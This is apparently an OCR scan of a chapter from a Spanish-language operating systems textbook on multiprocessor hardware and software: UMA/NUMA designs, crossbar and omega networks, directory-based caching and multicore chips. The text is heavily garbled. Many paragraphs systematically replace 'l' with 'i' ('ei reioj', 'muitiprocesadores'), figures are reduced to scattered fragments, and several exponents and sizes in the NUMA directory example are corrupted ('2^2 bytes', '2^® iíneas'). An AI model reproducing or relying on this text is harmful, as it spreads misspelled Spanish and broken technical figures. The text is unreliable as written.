humano y ios ingenieros aeronáuticos están interesados en construir aeronaves más seguras y efi¬ 
cientes, y todos eiios requieren más cicios de ia CPU. No importa cuánto poder de cómputo haya 
disponibie, nunca será suficiente. 

En ei pasado, ia soiución era siempre hacer que ei reioj operara a mayor veiocidad. Por des¬ 
gracia, estamos comenzando a toparnos con ciertos iímites fundamentaies sobre ia veiocidad dei 
reioj. De acuerdo con ia teoría especiai de ia reiatividad de Einstein, ninguna señai eiéctrica se 
puede propagar más rápido que ia veiocidad de ia iuz, que es de aproximadamente 30 cm/nseg en 
ei vacío y 20 cm/nseg en ei aiambre de cobre o ia fibra óptica. Esto significa que en una compu¬ 
tadora con un reioj de 10 GHz, ias señaies no pueden viajar más de 2 cm en totai. Para una com¬ 
putadora de 100 GHz ia iongitud totai de ia ruta es cuando mucho de 2 mm. Una computadora de 
1 THz (1000 GHz) tendría que ser más pequeña que 100 micrones, sóio para dejar que ia señai 
pase de un extremo ai otro y regrese una vez, dentro de un soio cicio de reioj. 

Tai vez sea posibie fabricar computadoras así de pequeñas, pero entonces iiegamos a otro pro- 
biema fundamentai: ia disipación dei caior. Entre más rápido opera ia computadora, más caior ge¬ 
nera y entre más pequeña sea, más difícii es deshacerse de este caior. De antemano en ios sistemas 
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Pentium de alto rendimiento, el enfriador de la CPU es más grande que la misma CPU. Con todo, 
para pasar de 1 M Hz a 1 GHz se requirió sólo una ingeniería cada vez mejor del proceso de fabri¬ 
cación del chip; para pasar de 1 GHz a 1 THz se va a requerir una metodología radicalmente 
distinta. 

Una metodología para obtener una mayor velocidad es a través de las computadoras masiva¬ 
mente en paralelo. Estas máquinas consisten en muchas CPUs, cada una de las cuales opera a una 
velocidad "normal" (lo que eso signifique en cierto año específico), pero que en conjunto tienen 
mucho más poder de cómputo que una sola CPU. Ahora hay sistemas con 1000 CPUs disponibles 
comercialmente. Es probable que se construyan sistemas con 1 millón de CPUs en la siguiente dé¬ 
cada. A unque hay otras metodologías potenciales para obtener mayor velocidad, como las compu¬ 
tadoras biológicas, en este capítulo nos enfocaremos en los sistemas con varias CPUs conven¬ 
cionales. 

Las computadoras altamente paralelas se utilizan con frecuencia para el cálculo numérico in¬ 
tensivo. Problemas como la predicción del clima, el modelado del flujo de aire alrededor del ala de 
una aeronave, la simulación de la economía mundial o la comprensión de las interacciones de los 
receptores de fármacos en el cerebro son actividades que requieren de cómputo intensivo. Sus so¬ 
luciones requieren largas ejecuciones en muchas CPUs a la vez. Los sistemas de múltiples proce¬ 
sadores que analizaremos en este capítulo se utilizan muchos para estos problemas y otros similares 
en la ciencia y en la ingeniería, entre otras áreas. 

Otro desarrollo relevante es el increíblemente rápido crecimiento de Internet. Se diseñó en su 
origen como un prototipo para un sistema de control militar tolerante a fallas, después se hizo po¬ 
pular entre los científicos computacionales universitarios, y desde hace tiempo adquirió muchos 
usos nuevos. Uno de ellos es vincular miles de computadoras en todo el mundo para que trabajen 
en conjunto en problemas científicos grandes. En cierto grado, un sistema que consiste en 1000 
computadoras esparcidas por todo el mundo no es distinto a uno que consiste en 1000 computado¬ 
ras en un solo cuarto, aunque el retraso y otras características técnicas son diferentes. También con¬ 
sideraremos estos sistemas en este capítulo. 

Es fácil colocar 1 millón de computadoras no relacionadas en una habitación, siempre y cuan¬ 
do se tenga el dinero suficiente... y una habitación lo bastante grande. Esparcir 1 millón de compu¬ 
tadoras no relacionadas alrededor del mundo es incluso más sencillo, ya que no se tiene el segun¬ 
do problema. Las dificultades empiezan cuando queremos que las computadoras se comuniquen 
entre sí para que trabajen en conjunto en un solo problema. Como consecuencia, se ha realizado 
mucho trabajo en cuanto a la tecnología de interconexión, y distintas tecnologías de interconexión 
han producido tipos de sistemas con diferente calidad y distintas organizaciones de software. 

En última instancia, toda la comunicación entre los componentes electrónicos (u ópticos) se ba¬ 
sa en el envío de mensajes (cadenas de bits bien definidas) entre ellos. Las diferencias están en la 
escala de tiempo, la escala de distancia y la organización lógica involucrada. En un extremo se 
encuentran los multiprocesadores de memoria compartida, en los cuales cierta cantidad de CPU s (en¬ 
tre 2 y aproximadamente 1000) se comunican a través de una memoria compartida. En este modelo, 
cada CPU tiene el mismo acceso a toda la memoria física, y puede leer y escribir palabras individua¬ 
les mediante instrucciones load y store. Para acceder a una palabra de memoria por lo general se 
requieren de 2 a 10 nseg. Aunque este modelo, que se ilustra en la figura 8-l(a), parece simple, en 
realidad no es tan sencillo implementarlo y por lo general implica el paso de muchos mensajes 
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de manera interna, como explicaremos en breve. Sin embargo, este proceso de paso de mensajes es 
invisible para los programadores. 


CPU 

/ 




0 - 


Memoria 

compar¬ 

tida 




0 ¿ 


(a) 


Memoria 

local 



Interco- 

[m}{^ nexión -[c}{^ 



(b) 



(c) 


Figura 8-1. (a) Un multiprocesador con memoria compartida, (b) Una multicompu- 
tadora con paso de mensajes, (c) U n sistema distribuido de área amplia. 


A continuación tenemos el sistema de la figura 8-l(b), en el cual varios pares de CPU-memoria 
se conectan a una interconexión de alta velocidad. A este tipo de sistema se le conoce como multi- 
computadora con paso de mensajes. Cada memoria es local para una sola CPU y puede ser utilizada 
sólo por esa CPU. Las CPUs se comunican enviando mensajes de varias palabras a través de la in¬ 
terconexión. Con una buena interconexión, un mensaje corto se puede enviar en un tiempo de 10 a 
50 pseg, pero aún es más largo que el tiempo de acceso a la memoria de la figura 8-l(a). No hay me¬ 
moria global compartida en este diseño. Las multicomputadoras (es decir, sistemas de paso de men¬ 
sajes) son mucho más fáciles de construir que los multiprocesadores (memoria compartida), pero son 
más difíciles de programar. Por lo tanto, cada género tiene sus admiradores. 

El tercer modelo, que se ilustra en la figura 8-l(c), conecta sistemas de cómputo completos a tra¬ 
vés de una red de área amplia como Internet, para formar un sistema distribuido. Cada uno de es¬ 
tos sistemas tiene su propia memoria, y los sistemas se comunican mediante el paso de mensajes. La 
única diferencia real entre la figura 8-l(b) y la figura 8-l(c) es que en esta última se utilizan compu¬ 
tadoras completas, y los tiempos de los mensajes son comúnmente entre 10 y 100 mseg. Este largo 
retraso obliga a que estos sistemas débilmente acoplados se utilicen de maneras distintas a los sis¬ 
temas fuertemente acoplados de la figura 8-l(b). Los tres tipos de sistemas difieren en sus retrasos 
por una cantidad aproximada a los tres órdenes de magnitud. Ésa es la diferencia entre un día y tres 
años. 

Este capítulo consta de cuatro secciones principales, que corresponden a los tres modelos de la 
figura 8-1 más una sección sobre la virtualización, que es una manera en software de crear la apa¬ 
riencia de más CPUs. En cada sección empezaremos con una breve introducción al hardware rele¬ 
vante. Después pasaremos al software, en especial las cuestiones relacionadas con el sistema 
operativo para ese tipo de sistema. Como veremos, en cada caso hay diferentes cuestiones presen¬ 
tes y se requieren distintas metodologías. 
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8.1 MULTIPROCESADORES 

Un multiprocesador con memoria compartida (o sólo multiprocesador, de aquí en adelante) es 
un sistema de cómputo en el que dos o más C PU s comparten todo el acceso a una R A M común. U n 
programa que se ejecuta en cualquiera de las CPUs ve un espacio normal de direcciones virtuales 
(por lo general paginadas). La única propiedad inusual que tiene este sistema es que la CPU puede 
escribir cierto valoren una palabra de memoria y después puede volver a leer esa palabra y obtener 
un valor distinto (tal vez porque otra CPU lo cambió). Si se organiza en forma correcta, esta pro¬ 
piedad forma la base de la comunicación entre procesadores: una CPU escribe ciertos datos en la 
memoria y otra lee esos datos. 

En su mayor parte, los sistemas operativos multi procesadores son sólo sistemas operativos re¬ 
gulares. M anejan las llamadas al sistema, administran la memoria, proveen un sistema de archivos 
y administran los dispositivos de E/S. Sin embargo, hay ciertas áreas en las que tienen característi¬ 
cas únicas. Estas áreas son la sincronización de procesos, la administración de recursos y la progra¬ 
mación de tareas. A continuación analizaremos con brevedad el hardware de los multi procesadores 
y después pasaremos a ver las cuestiones relacionadas con estos sistemas operativos. 

8.1.1 H ardware de multiprocesador 

Aunque todos los multi procesadores tienen la propiedad de que cada CPU puede direccionar toda la 
memoria, algunos tienen la característica adicional de que cada palabra de memoria se puede leer con 
la misma velocidad que cualquier otra palabra de memoria. Estas máquinas se conocen como mui ti pro¬ 
cesadores UM A (U niform M emory Access, Acceso uniforme a la memoria). Por el contrario, los mul¬ 
ti procesadores NUMA (Non-uniform Memory Access, Acceso no uniforme a la memoria) no tienen 
esta propiedad. M ás adelante aclararemos por qué existe esta diferencia. Primero examinaremos los 
multi procesadores U M A y después los N U M A. 

M ultiprocesadores U M A con arquitecturas basadas en bus 

Los multi procesadores más simples se basan en un solo bus, como se ilustra en la figura 8-2(a). Dos 
o más CPUs y uno o más módulos de memoria utilizan el mismo bus para comunicarse. Cuando 
una CPU desea leer una palabra de memoria, primero comprueba si el bus está ocupado. Si está 
inactivo, la CPU coloca la dirección de la palabra que desea en el bus, declara unas cuantas seña¬ 
les de control y espera hasta que la memoria coloque la palabra deseada en el bus. 

Si el bus está ocupado cuando una CPU desea leer o escribir en la memoria, la CPU espera só¬ 
lo hasta que el bus esté inactivo. Aquí es donde se encuentra el problema con este diseño. Con dos 
o tres CPUs, la contención por el bus será manejable: con 32 o 64 será imposible. El sistema esta¬ 
rá totalmente limitado por el ancho de banda del bus, y la mayoría de las CPUs estarán inactivas la 
mayor parte del tiempo. 

La solución a este problema es agregar una caché a cada CPU, como se ilustra en la figu¬ 
ra 8.2(b). La caché puede estar dentro del chip de la CPU, a un lado de ésta, en el tablero del procesa¬ 
dor o puede ser alguna combinación de las tres opciones anteriores. Como esto permite satisfacer 
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Bus 

(a) (b) (c) 

Figura 8-2. Tres multiprocesadores basados en bus. (a) Sin caché, (b) Con 
caché, (c) Con caché y memorias privadas. 

muchas operaciones de iectura desde ia caché iocai, habrá mucho menos tráfico en ei bus y ei sistema 
podrá soportar más CPUs. En generai, ei uso de caché no se reaiiza por cada paiabra individuai, sino 
por bioques de 32 o 64 bytes. Cuando se hace referencia a una paiabra, se obtiene su bioque compieto 
(conocido como línea de caché) y secoioca en ia caché de ia CPU que está en contacto con eiia. 

Cada bioque de ia caché se marca como de sóio iectura (en cuyo caso puede estar presente en 
varias cachés ai mismo tiempo) o como de iectura-escritura (no puede estar presente en otras ca- 
chés). Si una CPU trata de escribir una paiabra que está en una o más cachés remotas, ei hardware 
dei bus detecta i a escritura y coi oca una señai en ei bus para informar a todas i as demás cachés so¬ 
bre ia operación de escritura. Si otras cachés tienen una copia "iimpia" (es decir, una copia exacta 
de io que hay en memoria), sóio tienen que descartar sus copias y dejar que ia CPU que va a escri¬ 
bir obtenga ei bioque de ia caché de ia memoria antes de modificada. Si aiguna otra caché tiene una 
copia "sucia" (es decir, modificada), debe escribida de vueita a ia memoria para que pueda conti¬ 
nuar ia escritura, o transferida directamente a ia CPU que va a reaiizar ia operación de escritura a 
través dei bus. A este conjunto de regias se ie conoce como protocolo de coherencia de cachés y 
es uno de muchos. 

Otra posibiiidad es ei diseño de ia figura 8-2(c), donde cada CPU tiene no sóio una caché, sino 
también una memoria privada iocai que utiiiza mediante un bus dedicado (privado). Para utiiizar es¬ 
ta configuración de manera óptima, ei compiiador debe coi ocar todo ei texto dei programa, ias cade¬ 
nas, constantes y demás datos de sóio iectura, ias piias y ias variabies iocaies en ias memorias 
privadas. De esta forma, ia memoria compartida se utiiiza sóio para escribir variabies compartidas. 
En ia mayoría de ios casos, esta cuidadosa coiocación reducirá de manera considerabieei tráfico en 
ei bus, pero requiere de una cooperación activa por parte dei compiiador. 

M ultiprocesadores UM A que utilizan Interruptores de barras cruzadas 

Aun con ia mejor caché, ei uso de un soio bus iimita ei tamaño de un muitiprocesador UM A a 16 o 
32 CPUs, aproximadamente. Para iograr aigo más se necesita un tipo distinto de interconexión. Ei 
circuito más simpie para conectar n CPUs a k memorias es ei Interruptor (conmutador) de ba¬ 
rras cruzadas, que se muestra en ia figura 8-3. Los interruptores de barras cruzadas se han utiiiza- 
do por décadas en ios puntos de intercambio de ios conmutadores teiefónicos para conectar un 
grupo de iíneas entrantes a un conjunto de iíneas saiientes de manera arbitraria. 















































528 


SISTEMAS DE M ULTIPLES PROCESADORES 


CAPITULO 8 


En cada intersección de una iínea horizontai (entrante) y una verticai (saiiente) hay un punto 
de cruce, ei cuai es un pequeño interruptor que puede estar abierto o cerrado en sentido eiéctrico, 
dependiendo de si ias iíneas horizontai y verticai van a conectarse o no. En ia figura 8-3(a) pode¬ 
mos ver tres puntos de cruce cerrados ai mismo tiempo, con io cuai se permiten tres conexiones en¬ 
tre ios pares (CPU, memoria) (010, 000), (101, 101) y (110, 010) ai mismo tiempo. También son 
posibies muchas otras combinaciones. De hecho, ei número de combinaciones es iguai ai número 
de ias distintas formas en que se pueden coiocar ocho torres en un tabiero de ajedrez. 


Memorias 



(a) 

Figura 8-3. (a) U n conmutador de barras cruzadas de 8 x 8. (b) U n punto de cruce 
abierto, (c) U n punto de cruce cerrado. 


U na de ias propiedades más agradabies de un interruptor de barras cruzadas es que es una red 
sin bloqueos, io cuai significa que a ninguna CPU se ie niega nunca ia conexión que necesita, de¬ 
bido a que aigún punto de cruce o una iínea ya estén ocupados (suponiendo que ei móduio de me¬ 
moria en sí esté disponibie). Además, no se necesita una pianeación por adeiantado. Aun si ya hay 
siete conexiones arbitrarias estabiecidas, siempre es posibie conectar ia CPU restantea ia memoria 
restante. 

Desde iuego que también es posibie ia contención de memoria, si dos CPUs desean acceder ai 
mismo móduio, ai mismo tiempo. Sin embargo, ai particionar ia memoria en n unidades, ia conten¬ 
ción se reduce por un factor de n en comparación con ei modeio de ia figura 8-2. 
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U na de las peores propiedades del conmutador de barras cruzadas es el hecho de que el nú¬ 
mero de puntos de cruce aumenta con base en n^. Con 1000 CPUs y 1000 módulos de memoria, 
necesitamos un millón de puntos de cruce. No es factible un interruptor de barras cruzadas de es¬ 
te tamaño. Sin embargo, para los sistemas de tamaño mediano, se puede utilizar el diseño de las 
barras cruzadas. 


M ultiprocesadores UM A que utilizan redes de conmutación multietapa 

Un diseño completamente distinto de multiprocesador se basa en el humilde conmutador de 2 x 2 
que se muestra en la figura 8-4(a). Este interruptor tiene dos entradas y dos salidas. Los mensajes que 
llegan en cualquiera de las líneas de entrada se pueden conmutar a cualquiera de las líneas de sali¬ 
da. Para nuestros fines, los mensajes deben contener hasta cuatro partes, como se muestra en la fi¬ 
gura 8-4(b). El campo Módulo indica qué memoria utilizar. Dirección especifica una dirección 
dentro de un módulo. CódigoOp proporciona la operación, como read o write. Por último, el cam¬ 
po Valor opcional puede contener un operando, como una palabra de 32 bits a escribir mediante una 
operación WRITE. El interruptor inspecciona el campo M ódulo y lo utiliza para determinar si el men¬ 
saje se debe enviar en X o en Y. 



Módulo 


Dirección 


CódigoOp 


Valor 


I 

J 


(a) (b) 

Figura 8-4. (a) U n conmutador de 2 x 2 con dos líneas de entrada (A y B) y dos 
líneas de salida (X y Y), (b) U n formato de mensaje. 

Nuestros conmutadores de 2 x 2 se pueden organizar de muchas formas para construir redes 
de conmutación multietapa más grandes (A dams y colaboradores, 1987; B huyan y colaboradores, 
1989; Kumary Reddy, 1987). Una posibilidad es la red omega de clase económica sin adornos, que 
se ilustra en la figura 8-5. Aquí hemos conectado ocho CPUs a ocho memorias, utilizando 12 con¬ 
mutadores. De manera más general, para n CPUs y n memorias necesitaríamos logjn etapas, con 
n/2 conmutadores por etapa, para un total de (n/ 2 )log 2 n conmutadores, que es mucho mejor que n^ 
puntos de cruce, en especial para valores grandes de n. 

El patrón de cableado de la red omega se conoce comúnmente como barajado perfecto, ya 
que la mezcla de las señales en cada etapa se asemeja al proceso de cortar a la mitad un mazo de 
cartas y después mezclarlas, carta por carta. Para ver cómo funciona la red omega, suponga que la 
CPU 011 desea leer una palabra del módulo de memoria 110. La CPU envía un mensaje read al in¬ 
terruptor ID que contiene el valor 110 en el campo M ódulo. El interruptor toma el primer bit (de 
más a la izquierda) de 110 y lo utiliza para el enrutamiento. Un 0 enruta a la salida superior y un 
1 a la inferior. Como este bit es un 1, el mensaje se enruta a través de la salida inferior hacia 2D. 

Todos los interruptores de la segunda etapa (incluyendo a 2D) utilizan el segundo bit para el 
enrutamiento. Éste también es un 1, por lo que ahora el mensaje se reenvía a través de la salida in¬ 
ferior hacia 3D. Aquí se evalúa el tercer bit y se encuentra que es 0. En consecuencia, el mensaje 
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3 etapas 


CPUs 


Memorias 



Figura 8-5. U na red de conmutación omega. 


pasa por la salida superior y llega a la memoria 110, como se desea. La ruta seguida por este men¬ 
saje está marcada en la figura 8-5 por la letra a. 

A medida que el mensaje pasa a través de la red de conmutación, los bits en el extremo izquier¬ 
do del número de módulo ya no se necesitan. Se les puede dar un buen uso al registrar ahí el núme¬ 
ro de línea entrante, para que la respuesta pueda encontrar su camino de regreso. Para la ruta a, las 
líneas entrantes son 0 (entrada superior a ID), 1 (entrada inferior a 2D) y 1 (entrada inferior a 3D), 
respectivamente. La respuesta se enruta de vuelta utilizando 011, sólo que esta vez se lee de dere¬ 
cha a izquierda. 

Al mismo tiempo que ocurre todo esto, la CPU 001 desea escribir una palabra en el módulo de 
memoria 001. Aquí ocurre un proceso análogo, donde el mensaje se enruta a través de las salidas 
superior, superior e inferior, respectivamente, marcadas por la letra b. Cuando llega, en su campo 
M ódulo se lee 001, lo cual representa la ruta que tomó. Como estas dos peticiones no utilizan nin¬ 
guno de los mismos conmutadores, líneas o módulos de memoria, pueden proceder en paralelo. 

Ahora considere lo que ocurriría si la CPU 000 quisiera acceder al mismo tiempo al módulo de 
memoria 000. Su petición entraría en conflicto con la petición de la CPU 001 en el interruptor 3A. 
Una de ellas tendría que esperar. A diferencia del conmutador de barras cruzadas, la red omega es 
una red con bloqueo. No todos los conjuntos de peticiones pueden procesarse al mismo tiempo. 
Puede haber conflictos sobre el uso de un cable o de un conmutador, así como entre las peticiones 
a la memoria y las respuestas de la memoria. 

Sin duda, es conveniente esparcir las referencias a memoria de manera uniforme a través de los 
módulos. Una técnica común es utilizar los bits de menor orden como el número de módulo. Por 
ejemplo, considere un espacio de direcciones orientado a bytes para una computadora que por lo 
general utiliza palabras completas de 32 bits. Los 2 bits de menor orden por lo general serán 00, pe¬ 
ro los siguientes 3 bits estarán distribuidos de manera uniforme. Al utilizar estos 3 bits como el nú¬ 
mero de módulo, las palabras consecutivas estarán en módulos consecutivos. Se dice que un sistema 
de memoria en el que las palabras consecutivas están en distintos módulos es entrelazado. Las me¬ 
morias entrelazadas maximizan el paralelismo, debido a que la mayoría de las referencias a memo- 
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ria son a direcciones consecutivas. También es posibie diseñar redes de conmutación que sean sin 
bioqueo y que ofrezcan varias rutas desde cada CPU a cada móduio de memoria, para esparcir me¬ 
jor ei tráfico. 

M ultiprocesadores NUM A 

Los muitiprocesadores UM A de un soio bus por io generai están iimitados a no más de unas cuan¬ 
tas docenas deCPUs, y ios muitiprocesadores de barras cruzadas o de conmutadores necesitan mu¬ 
cho hardware (costoso) y no son tan grandes. Para poder tener más de 100 CPUs, hay que ceder 
aigo. Por io generai, io que cede es ia idea de que todos ios móduios de memoria tienen ei mismo 
tiempo de acceso. Esta concesión nos iieva a ia idea de ios muitiprocesadores NUM A, como diji¬ 
mos antes. A i iguai que sus parientes U M A, proveen un soio espacio de direcciones a través de to¬ 
das ias CPUs, pero a diferencia deias máquinas UM A, ei acceso a ios móduios de memoria iocaies 
es más rápido que ei acceso a ios remotos. Por ende, todos ios programas UM A se ejecutarán sin 
cambios en ias máquinas NUM A, pero ei rendimiento será peor que en una máquina UM A a ia mis¬ 
ma veiocidad de reioj. 

Las máquinas NUM A poseen tres características ciave que, en conjunto, ias distinguen de otros 
muitiprocesadores: 

1. Hay un soio espacio de direcciones visibie para todas ias CPUs. 

2. Ei acceso a ia memoria remota es mediante instrucciones load y store. 

3. Ei acceso a ia memoria remota es más iento que ei acceso a ia memoria iocai. 

Cuando ei tiempo de acceso a ia memoria remota no está ocuito (debido a que no hay caché), ai sis¬ 
tema se ie i i ama NC-NUMA (No Cache NUMA, NUMA sin caché). Cuando hay cachés coheren¬ 
tes presentes, ai sistema se ie iiama CC-NUMA (Cache-Coherent NUMA, NUMA con cachés 
coherentes). 

Ei método más popuiar para construir grandes muitiprocesadores CC-NUMA en ia actuaiidad 
es ei multiprocesador basado en directorios. La idea es mantener una base de datos que indique 
dónde está cada iínea de caché y cuái es su estado. Cuando se hace referencia a una iínea de caché, 
se consuita ia base de datos para averiguar dónde está, y si está iimpia o sucia (modificada). Como 
esta base de datos se debe consuitar en cada instrucción que hace referencia a ia memoria, debe 
mantenerse en un hardware de propósito especiai, en extremo veioz, que pueda responder en una 
fracción de un cicio dei bus. 

Para que ia idea sobre un muitiprocesador basado en directorios sea aigo más concreta, vamos 
a considerar un ejempio simpie (hipotético): un sistema con 256 nodos donde cada nodo consista en 
una CPU y 16 M B de RAM conectados a ia CPU a través de un bus iocai. La memoria totai es de 
2^2 bytes, que se divide en 2^® iíneasdecachéde 64 bytes cada una. La memoria se asigna en forma 
estática entre ios nodos, con 0 a 16M en ei nodo 0, 16M a 32M en ei nodo 1, y así en io sucesivo. 
Los nodos se conectan mediante una red de interconexión, como se muestra en ia figura 8-6(a). Ca¬ 
da nodo también contiene ias entradas de directorio para ias 2^^ iíneas de caché de 64 bytes que 
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conforman su memoria de 2^^ bytes. Por el momento, vamos a suponer que una línea se puede con¬ 
tener a lo más en una caché. 


Nodo O Nodo 1 Nodo 255 

CPU Memoria CPU Memoria CPU Memoria 



(a) 


Bits 8 18 6 


Nodo 


Bioque 


Despia- 

zamiento 


(b) 


218_1 

n 



4 

0 


3 

0 


2 

1 

82 

1 

0 


0 

0 



(c) 


Figura 8.6. (a) Un multiprocesador basado en directorio de 256 nodos, (b) División 
de una dirección de memoria de 32 bits en campos, (c) El directorio en el nodo 36. 


Para ver cómo funciona el directorio, vamos a rastrear una instrucción load desde la CPU 20 
que hace referencia a una línea en la caché. Primero, la CPU que emite la instrucción la presenta a 
su M M U, que la traduce en una dirección física: por ejemplo, 0x24000108. La M M U divide esta 
dirección en las tres partes que se muestran en la figura 8-6(b). En decimal, las tres partes son el 
nodo 36, la línea 4 y el desplazamiento 8. La M M U ve que la palabra de memoria a la que se hace 
referencia es del nodo 36, no del nodo 20, por lo que envía un mensaje de petición a través de la 
red de interconexión al nodo de inicio de la línea (36), en donde le pregunta si su línea 4 está en 
la caché, y de ser así, en dónde está. 

Cuando la petición llega al nodo 36 a través de la red de interconexión, se enruta al hardware 
de directorio. El hardware la indexa en su tabla de 2^® entradas, una para cada una de sus líneas de 
caché, y extrae la entrada 4. De la figura 8-6(c) podemos ver que la línea no está en la caché, por 
lo que el hardware obtiene la línea 4 de la RAM local, la envía de vuelta al nodo 20 y actualiza la 
entrada 4 del directorio para indicar que la línea ahora está en caché en el nodo 20. 

Ahora consideremos una segunda petición, esta vez preguntando sobre la línea 2 del nodo 36. 
En la figura 8-6(c) podemos ver que esta línea está en la caché en el nodo 82. En este punto, el hard- 
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ware podría actualizar la entrada 2 del directorio para decir que la línea se encuentra ahora en el no¬ 
do 20, y después enviar un mensaje al nodo 82 para indicarle que debe pasar la línea al nodo 20 e 
invalidar su caché. Observe que hasta un "multiprocesador con memoria compartida" realiza mu¬ 
chas operaciones de paso de mensajes de manera interna. 

Como una observación rápida adicional, vamos a calcular cuánta memoria está siendo ocupa¬ 
da por los directorios. Cada nodo tiene 16 M B de RAM y 2^^ entradas de9 bits para llevar la cuen¬ 
ta deesa RAM . Por ende, la sobrecarga del directorio es de aproximadamente 9 x 2^^ bits, dividida 
entre 16 M B o aproximadamente de 1.76%, que por lo general es aceptable (aunque tiene que ser 
memoria de alta velocidad, lo que desde luego incrementa su costo). A un con las líneas de caché 
de 32 bytes, la sobrecarga sería sólo de 4%. Con líneas de caché de 128 bytes, sería menor de 1%. 

U na limitación obvia de este diseño es que una línea se puede colocar en caché sólo en un no¬ 
do. Para permitir que se coloquen líneas en caché en varios nodos, necesitaríamos alguna forma de 
localizarlos a todos, por ejemplo para invalidarlos o actualizarlos en una escritura. Hay varias op¬ 
ciones posibles para permitir el uso de caché en varios nodos al mismo tiempo, pero un análisis de 
estas opciones es algo que está más allá del alcance de este libro. 


C hips multinúcleo 

A medida que mejora la tecnología de fabricación de chips, los transistores se están haciendo cada 
vez más pequeños y es posible colocar cada vez más de ellos en un chip. A esta observación empí¬ 
rica se le conoce algunas veces como Ley de Moore, en honor del co-fundador de Intel Gordon 
M oore, quien la descubrió primero. Los chips en la clase del Intel Core 2 Dúo contienen cerca de 
300 millones de transistores. 

Una pregunta obvia es: "¿Qué se debe hacer con todos esos transistores?". Como vimos en la 
sección 1.3.1, una opción es agregar megabytes de caché al chip. Esta opción es seria, y los chips 
con 4 M B de caché fuera del chip ya son comunes, con cachés más grandes en camino. Pero en cier¬ 
to punto, incrementar el tamaño de la caché tal vez sólo eleve la tasa de aciertos de 99% a 99.5%, 
lo cual no mejora mucho el rendimiento de las aplicaciones. 

La otra opción es colocar dos o más CPUs completas, a las que generalmente se les denomina 
núcleos, en el mismo chip (técnicamente, en la misma pastilla). Los chips de doble núcleo y de 
cuádruple núcleo ya son comunes: se han fabricado chips con 80 núcleos, y los chips con cientos 
de núcleos ya están en el horizonte. 

Aunque las CPUs pueden o no compartir cachés (por ejemplo, vea la figura 1-8), siempre 
comparten la memoria principal, y ésta es consistente en el sentido de que siempre hay un valor 
único para cada palabra de memoria. Los circuitos de hardware especiales aseguran que si hay una 
palabra presente en dos o más cachés, y una de las CPUs modifica la palabra, ésta se remueva en 
forma automática y atómica de todas las cachés para poder mantener la consistencia. A este pro¬ 
ceso se le conoce como snooping. 

El resultado de este diseño es que los chips multinúcleo son sólo pequeños multiprocesadores. 
De hecho, a los chips multinúcleo se les conoce algunas veces como CMPs (Multiprocesadoresa 
nivel de chip). Desde la perspectiva del software, los CM Ps no son en realidad tan distintos de los 
multi procesadores basados en bus, o de los multiprocesadores que utilizan redes de conmutación. 
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Sin embargo, hay algunas diferencias. Para empezar, en un multiprocesador basado en bus cada 
CPU tiene su propia caché, como en la figura 8-2(b) y también como en el diseñoAM D de la figu¬ 
ra l-8(b). El diseño de caché compartida de la figura l-8(a), que Intel utiliza, no ocurre en otros 
multiprocesadores. L a caché L 2 compartida puede afectar el rendimiento. Si un núcleo necesita mu¬ 
cha memoria caché y los otros no, este diseño permite que ese núcleo tome lo que necesite. Por otro 
lado, la caché compartida también hace posible que un núcleo avaricioso dañe el rendimiento délos 
demás núcleos. 

Otra área en la que los CM Ps difieren de sus primos más grandes es la tolerancia a fallas. Co¬ 
mo las CPUs tienen una conexión tan estrecha, las fallas en los componentes compartidos pueden 
afectar a varias CPUs a la vez, algo que es menos probable en los multiprocesadores tradicionales. 

Además délos chips multi núcleo simétricos, en donde todos los núcleos son idénticos, hay otra 
categoría de chip multinúcleo conocida como sistema en un chip. Estos chips tienen una o más 
CPUs principales, pero también tienen núcleos de propósito especial, como decodificadores de vi¬ 
deo y audio, criptoprocesadores, interfaces de red y demás, con lo cual se obtiene un sistema de 
cómputo completo en un chip. 

Como ha ocurrido con frecuencia en el pasado, el hardware está muy adelantado al software. 
Aunque los chips multinúcleo ya están aquí, nuestra habilidad para escribir aplicaciones para ellos 
todavía no. Los lenguajes de programación actuales no están preparados para escribir programas 
altamente paralelos, y los buenos compiladores y herramientas de depuración son escasos. Po¬ 
cos programadores han tenido experiencia con la programación en paralelo y la mayoría saben 
poco acerca de cómo dividir el trabajo en varios paquetes que se puedan ejecutar en paralelo. La 
sincronización, la eliminación de las condiciones de carrera y la prevención del interbloqueo van 
a ser pesadillas, y el rendimiento sufrirá de manera considerable como resultado. Los semáforos 
no son la respuesta. Y más allá de estos problemas iniciales, está muy lejos de ser obvio qué tipo 
de aplicación realmente necesita cientos de núcleos. El reconocimiento de voz en lenguaje natural 
probablemente podría absorber mucho poder de cómputo, pero el problema aquí no es la falta de 
ciclos, sino de algoritmos que funcionen. En resumen, los diseñadores de hardware pueden estar 
ofreciendo un producto que los diseñadores de software no saben cómo usar, y que los usuarios no 
quieren. 

8.1.2 Tipos de sistemas operativos multiprocesador 

Ahora vamos a pasar del hardware de multiprocesador al software de multiprocesador, y en espe¬ 
cial a los sistemas operativos multiprocesador. Hay varias metodologías posibles. A continuación 
estudiaremos tres de ellas. Observe que todas se pueden aplicar de igual forma a los sistemas mul¬ 
tinúcleo, así como a los sistemas con CPUs discretas. 

Cada C PU tiene su propio sistema operativo 

La manera más simple posible de organizar un sistema operativo multiprocesador es dividir estáti¬ 
camente la memoria y su propia copia privada del sistema operativo. En efecto, las n CPUs operan 
entonces como n computadoras independientes. Una optimización obvia es permitir que todas las 
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CPUs compartan el código del sistema operativo 
de datos del sistema operativo, como se muestra 


CPU 1 CPU 2 CPU 3 



obtengan copias privadas sólo de las estructuras 
1 la figura 8-7. 


CPU 4 Memoria E/S 



\ 


Bus 


Figura 8-7. Particionamiento de la memoria de un multiprocesador entre cuatro CPUs, 
pero compartiendo una sola copia del código del sistema operativo. Los cuadros mar¬ 
cados como Datos son los datos privados del sistema operativo para cada CPU. 


Este esquema es aún mejor que tener n computadoras separadas, ya que permite que todas las 
máquinas compartan un conjunto de discos y otros dispositivos de E/S, y también permite com¬ 
partir la memoria con flexibilidad. Por ejemplo, aun con la asignación estática de memoria, una 
CPU puede recibir una porción extra-grande de la memoria para poder manejar con eficiencia los 
programas grandes. Además, los procesos pueden comunicarse de manera eficiente unos con otros, 
al permitir que un productor escriba los datos directamente en la memoria y que un consumidor 
los obtenga del lugar en el que los escribió el productor. A ún así, desde la perspectiva de un siste¬ 
ma operativo, el que cada CPU tenga su propio sistema operativo es lo más primitivo posible. 

Vale la pena mencionar cuatro aspectos de este diseño que tal vez no sean obvios. En primer 
lugar, cuando un proceso realiza una llamada al sistema, ésta se atrapa y maneja en su propia CPU, 
usando las estructuras de datos en las tablas de ese sistema operativo. 

